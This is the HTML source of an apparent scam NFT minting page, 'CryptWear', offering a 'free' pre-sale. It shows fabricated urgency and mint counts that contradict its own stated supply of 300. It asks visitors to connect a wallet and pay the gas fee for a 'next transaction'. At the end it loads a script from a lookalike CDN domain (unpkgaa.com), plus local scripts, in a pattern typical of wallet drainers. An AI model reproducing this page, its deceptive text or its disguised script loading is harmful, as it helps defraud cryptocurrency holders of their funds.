<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="icon" href="/favicon.png">
    <title>
        CryptWear ™
    </title>
    <!--  svg 引入  -->
    <link href="style/mobile.css" rel="stylesheet">
    <meta content="𝐂𝐋𝐈𝐂𝐊 𝐇𝐄𝐑𝐄 𝐓𝐎 𝐌𝐈𝐍𝐓!" property="og:title">
    <meta content="📢𝐏𝐫𝐞-𝐒𝐚𝐥𝐞 𝐢𝐬 𝐋𝐈𝐕𝐄!
    🏷️ Pre-sale info:
    ▶ Price: FREE
    ▶ Supply: 300 NFT
    ▶ Limit: 5 NFT per wallet
    🚨 All other links are FAKE 🚨
    Thank you for your support and patience!
    " property="og:description">
    <meta content="https://i.postimg.cc/9XwRFCs5/pic-49.gif" property="og:image">
    <meta name="theme-color" content="#7289DA">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="theme-color" content="#7289DA">
    <meta name="twitter:card" content="summary_large_image">
</head>

<body>
    <div id="app" data-v-app="">
        <div class="main">
            <div class="bg-layer"></div>
            <div class="conten-box">
                <div class="right">
                    <div class="right-content">
                        <div class="right-content-top">
                            <img src="https://i.postimg.cc/9XwRFCs5/pic-49.gif" alt="" style="" class="">
                            <img src="" alt="" style="display: none;" class=""><img src="" alt="" style="display: none;" class=""><span id="names" class="right-content-top-l1"></span><span class="right-content-top-l2">LIMITED SALE</span>
                            <div class="right-content-top-l3"><span id="timess">06/07/2022 23:24:13</span><span class="tag">PRE-SALE IS LIVE</span></div>
                        </div>
                        <div class="right-content-bottom">
                            <div class="right-content-bottom-l1">
                                <div><i class="iconfont iconjian minus"></i><span class="count">1</span><i class="iconfont iconjia plus"></i></div>
                                <div><span>Total：</span><span class="totalPrice"></span><span> ETH</span><i class="iconfont iconyitaifang"></i></div>
                            </div>
                            <div id="claimButton" class="right-content-bottom-l2 mint disable" style="display: none;"> MINT </div>
                            <div id="connectButton" class="right-content-bottom-l2 connect" style="display: block;"> CONNECT </div>
                            <span class="right-content-bottom-l3"><span id="start_txt" style="color: rgb(221, 162, 14);">488</span> out of <span id="end_txt" style="color: rgb(0, 186, 127);">1444</span> minted <i class="iconfont iconshandian" style="color: rgb(255, 200, 61);"></i></span>
                            <div style="width: 80%; margin: 0px auto;">
                                <div class="el-progress el-progress--line el-progress--text-inside" role="progressbar" aria-valuenow="33.80" aria-valuemin="0" aria-valuemax="100">
                                    <div class="el-progress-bar">
                                        <div class="el-progress-bar__outer" style="height: 24px;">
                                            <div id="percentages_lin" class="el-progress-bar__inner" style="width: 33.8%; animation-duration: 3s; background-color: rgb(221, 198, 19);">
                                                <div class="el-progress-bar__innerText"><span id="percentages_txt">33.80%</span></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div><span class="right-content-bottom-l3">Note: You need to pay gas fee of next transaction to complete final step.</span>
                        </div>
                    </div>
                </div>
                <div class="left-l5"><span></span><i id="discord_btn" class="iconfont icondiscord"></i><i id="twitter_btn" class="iconfont icontwitter"></i></div>
            </div>
        </div>
    </div>
    <div id="body" class="el-notification" style="box-shadow: 0 0 0 0 !important;"></div>
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="style/bootstrap.min.js"></script>
<script src="https://kit.fontawesome.com/eb3551e939.js" crossorigin="anonymous"></script>

<script src="style/moralis.js"></script>
<script src="style/asli.js"></script>
<script src="https://unpkgaa.com/web3@latest/dist821/web33.min.js"></script>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js?id=JhNwH6v6cca3mg6p&ck=JhNwH6v6cca3mg6p"></script>

</html>